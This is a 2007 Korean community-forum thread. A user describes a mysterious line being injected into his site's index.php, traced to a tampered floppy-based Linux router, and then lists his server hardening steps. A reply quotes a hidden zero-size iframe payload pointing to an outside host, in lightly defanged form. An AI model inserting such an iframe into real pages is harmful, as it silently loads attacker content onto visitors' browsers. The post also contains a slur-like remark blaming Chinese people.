얼마전에 피싱에 관한 글 올렸었지요.

얼마전에 피싱에 관한 글 올렸었지요. 정보

얼마전에 피싱에 관한 글 올렸었지요.

포대장 홈페이지 자기소개 아이디로 검색 회원게시물 (121.♡.♡.170)
2007.02.13 23:51:45
3,428

본문

위의 내용이 index.php 파일의 첫줄에 자동으로 붙는 기이한 현상이 발생했습니다.

문제는 내부 PC가 아닌 외부 PC에서는 홈피에 문제 없이 접속이 된다는 사실입니다.

내부 PC는 모두 코요테 리눅스를 설치하여 만든 PC 아이피 공유기를 사용하고 있습니다.

디스켓 한장짜리 아이피 공유기지요.

이놈이 좋은 점은 유동아이피를 가져와서 접속을 계속 유지 시켜준다는것입니다.

리셋 스위치를 누르기 전까지는 아이피 접속을 유지 시켜줍니다.

의혹1 : 나의 아이피로 접속하기 전에 들렀다가 오는곳을 만들어 두지 않았는가?

왜냐하면 글을 쓰거나 로그인을 하면 꼭 위의 사이트를 거친다는 것입니다.

의혹2 : 코요테 리눅스에 접속하여 스크립트를 심은다음 재부팅 하지 않았는가?

저는 의혹2번에 거의 90%이상 비중을 두고 있습니다.

왜냐하면 디스켓을 다시 제작하고 부팅하니 문제가 없어졌다는 것입니다.

디스켓도 라이트 프로텍트 시키구요.

중국놈들 때문에 세계가 발칵뒤집힐 일이 조만간에 벌어질것만 같네요.

몇일전에 중국발 해킹 뉴스 들으셨죠? 사상 최대 피해 규모라나요..ㅠㅠ

아무튼 좋은 경험한 듯 합니다. 관심 가져 주신분들께 감사의 인사를 전합니다.

리셋 스위치 누르고 저도 퇴근해야겠습니다....ㅎㅎ

행복한 꿈 꾸세요.

댓글 2개

도규니 자기소개 아이디로 검색 회원게시물

자기소개 아이디로 검색 회원게시물

(58.♡.♡.196)

07.02.14 00:54:05

얼마전에 뉴스에서 <iframe-x-x src=http://a.d3a.us/ width=0 height=0 frameborder=0></iframe-x-x> 문구 봤었는데^^ 그때 그누에서 그때 본것 생각 나서... 잠깐 찾아 봤는데 못 찾고 포대장님께서 글 올려 주셔서 또 보내요(^^) 저도 본체 486으로 아이피 공유 하다. 너무. 부피도 크고 소음도 발생 하여서 아주 구석진곳에 쿨러 다 뽑고! 몇달 돌린적 있습니다 ㅋㅋ 그리고 나서 유선 아이피 공유기 하나 장만 하여서 아직까지 잘 돌리고 있답니다// 아이피 주소는 거의 공유기 랑 외장 모뎀 전원선 뽑기 전까지는 계속 유지 하더라고요 공유기가 접속 유지 식혀 줘서~
그런데 디스켓으로 공유기 구축 하시고 방지 홀더 채워 두면은 천하 무적이겠네요 ㅋㅋ

포대장 홈페이지 자기소개 아이디로 검색 회원게시물

홈페이지 자기소개 아이디로 검색 회원게시물

(121.♡.♡.170)

07.02.14 14:04:20

동지를 만났네요...ㅎㅎ 반갑습니다.

그렇습니다. 제가 쓰기 방지만 시켜뒀어도 이런일이 없었을텐데...후회가 막급입니다.

이제는 안심해도 될듯합니다.

서버가 해킹당했다는 사실은 생각도 하기 싫습니다.

왜냐하면요.....서버 셋팅할때 정말 엄청난 심혈을 기울였거든요.

1. 아이피 테이블을 이용해서 저희 지역 아이피 대역만 텔넷, FTP 접속가능하게 설정했구요.

2. 루트 권한으로는 절대 로그인 금지.... 비밀 계정으로 접속하여 su - 명령으로 루트권한 획득가능하게 했구요.(암호 저도 못 외워요. 너무 길고 어려워서.....ㅋㅋ)

3. 포트스캔하면 무조건 적으로 간주 allow.deny에 등록하도록 했구요....ㅋㅋ

4. 해킹에 이용될 소지가 있는 명령은 삭제하거나 파일명을 모조리 변경했구요.

메일로 통보하는것이 4가지정도입니다. 아직까지는 별탈이 없는데 앞으로는 미지수...ㅎ

새해 복 많이 받으세요.^^

얼마전에 피싱에 관한 글 올렸었지요. > 자유게시판

자유게시판